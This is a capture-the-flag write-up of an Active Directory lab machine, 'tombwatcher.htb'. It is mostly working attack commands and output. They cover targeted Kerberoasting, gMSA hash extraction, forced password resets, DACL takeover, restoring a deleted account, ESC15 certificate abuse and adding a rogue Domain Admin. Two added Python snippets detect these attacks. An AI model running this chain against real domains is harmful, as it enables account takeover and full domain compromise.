This machine is an assumed-breach box, so account credentials are provided from the start.
Reconnaissance
Run an nmap scan.
PORT      STATE    SERVICE       REASON          VERSION
53/tcp    open     domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open     http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open     kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-02-24 18:24:23Z)
135/tcp   open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open     netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   filtered ldap          no-response
445/tcp   open     microsoft-ds? syn-ack ttl 127
464/tcp   open     kpasswd5?     syn-ack ttl 127
593/tcp   open     ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-02-24T18:26:03+00:00; +3h59m15s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:DC01.tombwatcher.htb
| Issuer: commonName=tombwatcher-CA-1/domainComponent=tombwatcher
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-11-16T00:47:59
| Not valid after:  2025-11-16T00:47:59
| MD5:     a396 4dc0 104d 3c58 54e0 19e3 c2ae 0666
| SHA-1:   fe5e 76e2 d528 4a33 8adf c84e 92e3 900e 4234 ef9c
| SHA-256: 5128 aaea b79b bc06 762a 04d6 b475 4a21 a52c d1b1 205a 0440 85bd f5d6 2734 6ea9
5985/tcp  filtered wsman         no-response
9389/tcp  open     mc-nmf        syn-ack ttl 127 .NET Message Framing
49666/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open     ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
49702/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
55593/tcp open     msrpc         syn-ack ttl 127 Microsoft Windows RPC
Run BloodHound using the provided henry account.

henry has WriteSPN over alfred.
Set a temporary SPN with targetedKerberoast and perform a Kerberoast attack.
┌──(kali㉿kali)-[~/opt/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d TOMBWATCHER.HTB -u henry -p 'H3nry_987TGV!' --request-user alfred
[*] Starting kerberoast attacks
[*] Attacking user (alfred)
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$TOMBWATCHER.HTB/Alfred*$56fe6550716f8667d09d63f0761c47c9$642148062edecce8cc54fb874fab1eb98710da542055022f58a575432af9a4a5aefdb2014975d377ccfdc822fe8c3223b5fa86796144d45b7b00c94e3cc96424afc5ac2d9bb05364523dc61351802858c13eb712e738955b61e02a70bb665613123874873bcedd86662083ba8ca0965bdf17c9af04bf0e12d0f25767488f02e8a08e1b33d4e709ecc9a4b21477c36b17f1fd74aedb098867937e83173031342f58d33167b4f804706d2b4f860e31ae5fb931894f5299f1bedf19dca840c13822b995634a37a4cf18080fb53c4c7c66a4cc9f672bfc6082a95ebee3ca46cfc65d17576e613874dbacb46bc1feb20813ab31db0ae497a04bc684fcfaa867fd539aa3406f14534850d6aa32c81b75e2af6c1b619a3bea81d553916b581eca84392a6d4e59ac06278b6fb63318aa1d868d288f4c2e789edf020443138a08bb98fefe44535d60e3283b0ad72f0f11fd6c0a11fac6b6972095ccfb0db848ef65f4cdd18750aaa9639245114880ef7f585c52c3011c1ce2d89bd387e1e6fb2ee41373cd8977cab85d7601f175be416fa39dff75efabeb31d3634fdabd9277e16a9ca625717bfe2cac3436dd33e0c819f9fe2cce79cc67a9f5aab3ae308bc21abe7c459e124514bcb0cc2d2e686e55d5021e79756f6562ab873dfbb5d3b849640bf7d6f224c5996619a78dccf1d67df306879c9df6a36cce004cd0d6391fdb93eb6091063e11275271e58190017b384b215b080d0a11d13f90bc43759446f9228ec0347c53454677e6bee9193e178f8eb78cf79efa683a15f4abb5ea0d6a26b9db2b0588366a1bcd8744a55edc5cc51373d5f0eab2f334d599e7abbb608be8e18c2b25fe8d7d06d952ec940cd9d5c25e9be20703d0f05429873f7632713fedb00beba3f57e957063bba6aae1fa5b37a29b9c9b5e40a7c8dda735c2e62f306743c78b3921320899b9b2bfaa76111083eeef38e8033ef705aba43d7585739077c6a2abb06f39eab6b16fb667bca79c03cb94252f726cfb7d2565143e26da7bcfbf1217567bf0fde07701c4e416702badedf1c219a8e65d121452cab17ecd8c573aac86a6d1216ce0269930040e01dc812f005d9705842e4609569216915ea909957eb99ab9ce81933812a7bc229413090ed5f2bb45f0938644441d7b296a04580c560b90bd3a064f08d12b4be139fb2537e298a8b64372a1d59f8e22665355963d7ed3aefb67239b2fe00582be7c49448c82258757b43b5f474efa1e67d3c8104b1ebdceb082c1b9f4561493c800b3b194c6f00097b9633d402c316a8b9e36dd156b7376007ce80743fe70435b8f67e4205e77922dfbbe0944850b7f9f5ff6da1c62f8a3ac7c78e8e7f515347b21d0117c3d3f14dcd5c7443ab1a14e1d03a477e238317f285d5d3daf8e0669fa8e6231a706c3c5ea5a3c8de5f1be42e8a421effbbeb3a499a7795c9d0c24ee671874d0c7ba3bdd0124122b7b2e
[VERBOSE] SPN removed successfully for (Alfred)
If an error such as "KRB_AP_ERR_SKEW (Clock skew too great)" appears when running it, synchronize the clock with NTP and run it again.
The following is a reference on NTP synchronization.
Cracking the obtained hash yields alfred / basketball.
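As an added example (not part of the writeup or of targetedKerberoast), this is the detection logic a defender would run over DC01's Security log for the step above: a servicePrincipalName write (event 5136, value added) on an account, followed within a short window by an RC4 service-ticket request (event 4769, encryption type 0x17) for that account from the same requester, then optionally the SPN being removed again. The events are constructed samples shaped like those this step would leave behind.

```python
from datetime import datetime, timedelta

# Constructed Windows Security events (not taken from the writeup), modelled on
# what henry's targetedKerberoast run above would leave on DC01: 5136 for the
# SPN write, 4769 for the RC4 service ticket, 5136 again for the SPN removal.
EVENTS = [
    {"EventID": 5136, "Time": "2026-02-24T18:30:00", "SubjectUserName": "henry",
     "ObjectDN": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "%%14674"},
    {"EventID": 4769, "Time": "2026-02-24T18:30:02", "TargetUserName": "henry@TOMBWATCHER.HTB",
     "ServiceName": "Alfred", "TicketEncryptionType": "0x17"},
    {"EventID": 5136, "Time": "2026-02-24T18:30:03", "SubjectUserName": "henry",
     "ObjectDN": "CN=Alfred,CN=Users,DC=tombwatcher,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "%%14675"},
    {"EventID": 4769, "Time": "2026-02-24T18:40:00", "TargetUserName": "alfred@TOMBWATCHER.HTB",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12"},  # benign AES ticket
]
VALUE_ADDED, VALUE_DELETED = "%%14674", "%%14675"  # 5136 OperationType codes

def _cn(dn):
    return dn.split(",")[0].split("=", 1)[1].lower()  # first RDN value of a DN

def _t(e):
    return datetime.fromisoformat(e["Time"])

def targeted_kerberoast_hits(events, window=timedelta(minutes=10)):
    """Pair an SPN 'value added' on an account with an RC4 (0x17) TGS request for that
    account by the same requester inside the window; note whether the SPN was removed."""
    hits = []
    spn_adds = [e for e in events if e["EventID"] == 5136
                and e["AttributeLDAPDisplayName"] == "servicePrincipalName"
                and e["OperationType"] == VALUE_ADDED]
    for add in spn_adds:
        victim = _cn(add["ObjectDN"])
        for tgs in events:
            if (tgs["EventID"] == 4769 and tgs["TicketEncryptionType"] == "0x17"
                    and tgs["ServiceName"].lower() == victim
                    and tgs["TargetUserName"].split("@")[0].lower() == add["SubjectUserName"].lower()
                    and timedelta(0) <= _t(tgs) - _t(add) <= window):
                cleaned = any(e["EventID"] == 5136 and e["OperationType"] == VALUE_DELETED
                              and _cn(e["ObjectDN"]) == victim and _t(e) >= _t(tgs)
                              for e in events)
                hits.append({"actor": add["SubjectUserName"], "victim": victim,
                             "spn_removed_after": cleaned})
    return hits
```

The benign AES-encrypted ticket for DC01$ is deliberately ignored; the interesting signal is a user account suddenly acting as a service with RC4 right after its SPN changed.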
alfred has AddSelf on INFRASTRUCTURE.
Add alfred to the group with bloodyAD.

┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ bloodyAD -d tombwatcher.htb -u alfred -p basketball --host dc01.tombwatcher.htb add groupMember Infrastructure alfred
[+] alfred added to Infrastructure
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ net rpc group members INFRASTRUCTURE -U "TOMBWATCHER.htb"/"alfred"%"basketball" -S 10.129.9.5
TOMBWATCHER\Alfred
INFRASTRUCTURE has ReadGMSAPassword on ANSIBLE_DEV$.

Retrieve the NTLM hash.
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ netexec ldap dc01.tombwatcher.htb -u alfred -p basketball --gmsa
LDAP        10.129.9.5      389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:tombwatcher.htb)
LDAPS       10.129.9.5      636    DC01             [+] tombwatcher.htb\alfred:basketball
LDAPS       10.129.9.5      636    DC01             [*] Getting GMSA Passwords
LDAPS       10.129.9.5      636    DC01             Account: ansible_dev$   NTLM: 93f81a98d22217b6206d950528a4802e   PrincipalsAllowedToReadPassword: Infrastructure
ANSIBLE_DEV$ has ForceChangePassword over SAM.

Change SAM's password.
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ bloodyAD -d tombwatcher.htb -u 'ANSIBLE_DEV$' -p ':93f81a98d22217b6206d950528a4802e' --host dc01.tombwatcher.htb set password "sam" "qwerty12345\!"
[+] Password changed successfully!
SAM has WriteOwner over JOHN.

Set SAM as the owner of JOHN.
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ bloodyAD -d tombwatcher.htb -u sam -p 'qwerty12345!' --host dc01.tombwatcher.htb set owner john sam
[+] Old owner S-1-5-21-1392491010-1358638721-2126982587-512 is now replaced by sam on john
Next, grant SAM GenericAll on JOHN.
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ bloodyAD -d tombwatcher.htb -u sam -p 'qwerty12345!' --host dc01.tombwatcher.htb add genericAll john sam
[+] sam has now GenericAll on john
With GenericAll in place, change JOHN's password.
Use the new password to log in as JOHN and retrieve user.txt.
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ bloodyAD -d tombwatcher.htb -u sam -p 'qwerty12345!' --host dc01.tombwatcher.htb set password john 'qwerty12345!'
[+] Password changed successfully!
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ evil-winrm -i 10.129.9.5 -u john -p 'qwerty12345!'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents>
Privilege Escalation

JOHN has GenericAll on the ADCS OU.
Give JOHN full control over the ADCS OU.
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ impacket-dacledit -action write -rights FullControl -principal john -target-dn 'OU=ADCS,DC=TOMBWATCHER,DC=HTB' 'tombwatcher/john:qwerty12345!' -dc-ip 10.129.9.5
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20260226-224452.bak
[*] DACL modified successfully!
Check the certificate template information.
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ certipy-ad find -u john -p qwerty12345! -target tombwatcher.htb -dc-ip 10.129.9.5
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Failed to lookup object with SID 'S-1-5-21-1392491010-1358638721-2126982587-1111'
[*] Saving text output to '20260226224854_Certipy.txt'
[*] Wrote text output to '20260226224854_Certipy.txt'
[*] Saving JSON output to '20260226224854_Certipy.json'
[*] Wrote JSON output to '20260226224854_Certipy.json'
In the resulting txt output, the WebServer template has Enrollment Rights set (including the unresolved SID that certipy could not look up). This configuration is relevant to ESC15.
17
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
S-1-5-21-1392491010-1358638721-2126982587-1111
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
S-1-5-21-1392491010-1358638721-2126982587-1111
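An added example, not Certipy's own code: a small auditor that parses one template block from Certipy's text output (the WebServer block above, abridged) and reports the conditions that together make it an ESC15 candidate, in particular an enrollment right held by a SID that no longer resolves to a live object.

```python
import re

# Certipy 'find' text output for the WebServer template, abridged from the
# writeup above; this parser and check are an added example, not Certipy code.
TEMPLATE_TEXT = """\
Template Name : WebServer
Enabled : True
Enrollee Supplies Subject : True
Extended Key Usage : Server Authentication
Schema Version : 1
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\\Domain Admins
TOMBWATCHER.HTB\\Enterprise Admins
S-1-5-21-1392491010-1358638721-2126982587-1111
"""
HEADINGS = {"Permissions", "Enrollment Permissions", "Object Control Permissions"}
DOMAIN_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){4}$")  # a SID Certipy could not resolve
PRIVILEGED = {"Domain Admins", "Enterprise Admins"}

def parse_template(text):
    """'Field : value' lines become {field: [values]}; a line without ' : ' is a further value of the previous field."""
    fields, key = {}, None
    for line in (raw.strip() for raw in text.splitlines()):
        if not line or line in HEADINGS:
            continue
        if " : " in line:
            key, value = (s.strip() for s in line.split(" : ", 1))
            fields[key] = [value] if value else []
        elif key:
            fields[key].append(line)  # Certipy prints one principal per line
    return fields

def esc15_findings(t):
    """Each ESC15 precondition present on the template, as a readable string."""
    out = []
    if t.get("Schema Version") == ["1"]:
        out.append("schema version 1: application policies in the CSR are honoured by an unpatched CA")
    if t.get("Enrollee Supplies Subject") == ["True"]:
        out.append("enrollee supplies subject: the requester picks the SAN")
    for p in t.get("Enrollment Rights", []):
        if DOMAIN_SID_RE.match(p):
            out.append(f"enrollment right held by unresolved SID {p}: check Deleted Objects")
        elif p.split("\\")[-1] not in PRIVILEGED:
            out.append(f"enrollment right held by non-admin principal {p}")
    return out

def is_esc15_candidate(t):
    f = esc15_findings(t)  # enabled, v1 schema, requester-chosen subject, weak enroller
    return (t.get("Enabled") == ["True"] and t.get("Schema Version") == ["1"]
            and t.get("Enrollee Supplies Subject") == ["True"]
            and any(x.startswith("enrollment right") for x in f))
```

Feed it the full Certipy text output one template block at a time; an unresolved SID in Enrollment Rights is worth chasing in Deleted Objects, exactly as the writeup goes on to do.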
Look up the AD object that corresponds to that SID.
*Evil-WinRM* PS C:\Users\john\Desktop> get-adobject -Filter 'isdeleted -eq $true -and name -ne "Deleted Objects" -and objectSID -like "S-1-5-21-1392491010-1358638721-2126982587-1111"' -IncludeDeletedObjects -Properties samaccountname,displayname,objectsid
Deleted : True
DisplayName :
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
objectsid : S-1-5-21-1392491010-1358638721-2126982587-1111
samaccountname : cert_admin
Restore the account in question (restore, then verify).
restore-adobject "CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb"
*Evil-WinRM* PS C:\Users\john\Desktop> get-aduser cert_admin

DistinguishedName : CN=cert_admin,OU=ADCS,DC=tombwatcher,DC=htb
Enabled           : True
GivenName         : cert_admin
Name              : cert_admin
ObjectClass       : user
ObjectGUID        : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
SamAccountName    : cert_admin
SID               : S-1-5-21-1392491010-1358638721-2126982587-1111
Surname           : cert_admin
UserPrincipalName :
Change cert_admin's password.
*Evil-WinRM* PS C:\Users\john\Desktop> Set-ADAccountPassword -Identity 'cert_admin' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123" -Force)
*Evil-WinRM* PS C:\Users\john\Desktop>
Request a certificate.
Because the template's EKU is Server Authentication, the certificate is used to authenticate over LDAPS with Certipy's LDAP shell.
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ certipy-ad req -u 'cert_admin' -p 'Password123' -dc-ip '10.129.9.5' -ca 'tombwatcher-ca-1' -template 'WebServer' -upn 'administrator@tombwatcher.htb' -sid 'S-1-5-21-1392491010-1358638721-2126982587-500' -application-policies 'Client Authentication'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate object SID is 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.9.5 -ldap-shell
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.9.5:636'
[*] Authenticated to '10.129.9.5' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
#
Add a user and access the host with Evil-WinRM.
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.9.5 -ldap-shell
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] SAN URL SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Security Extension SID: 'S-1-5-21-1392491010-1358638721-2126982587-500'
[*] Connecting to 'ldaps://10.129.9.5:636'
[*] Authenticated to '10.129.9.5' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
# add_user test123
Attempting to create user in: %s CN=Users,DC=tombwatcher,DC=htb
Adding new user with username: test123 and password: Ad@dKYmNBb1U=?, result: OK
# add_user_to_group test123 "Domain Admins"
Adding user: test123 to group Domain Admins result: OK
#
┌──(kali㉿kali)-[~/htb/tombwatcher]
└─$ evil-winrm -i 10.129.9.5 -u test123 -p 'Ad@dKYmNBb1U=?,'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\test123\Documents>
root.txt can now be read.